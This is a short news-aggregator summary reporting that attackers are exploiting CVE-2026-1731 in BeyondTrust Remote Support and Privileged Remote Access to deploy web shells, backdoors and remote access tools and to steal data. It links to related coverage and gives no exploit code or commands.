BeyondTrust Flaw Sparks Global Web Shell Campaigns and Data Theft

February 21, 2026 at 03:58 AM

•

1 min read

BeyondTrust Flaw Sparks Global Web Shell Campaigns and Data Theft — Photo: The Hacker News

TL;DR Summary

Threat actors are exploiting CVE-2026-1731 in BeyondTrust RS/PRA to run OS commands, deploy web shells and backdoors, establish C2, and exfiltrate data across sectors worldwide. Unit 42 reports use of a thin-scc-wrapper via WebSocket to execute commands in the site user context, effectively taking control of appliances and traffic. Campaigns include PHP backdoors, VShell, a bash dropper, and Spark RAT, with staged exfiltration of config files, internal databases, and PostgreSQL dumps. The activity aligns with prior CVE-2024-12356 issues, and CISA KEV confirms exploitation in ransomware operations.

Topics:business #beyondtrust #cve-2026-1731 #data-exfiltration #ransomware #security #web-shells

Share this article

BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration The Hacker News
VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731) Unit 42
CISA: BeyondTrust RCE flaw now exploited in ransomware attacks BleepingComputer
BeyondTrust Remote Support exploitation ramps up with backdoors, remote tools Cybersecurity Dive
Hospitals at Risk of BeyondTrust Ransomware Hacks Bank Info Security

Reading Insights

Total Reads

Unique Readers

Time Saved

2 min

vs 3 min read

Condensed

80%

439 → 86 words

Want the full story? Read the original article

Read on The Hacker News

JavaScript Required

tl;dr daily news requires JavaScript to be enabled. Please enable JavaScript in your browser settings.

Related Sources

Reading Insights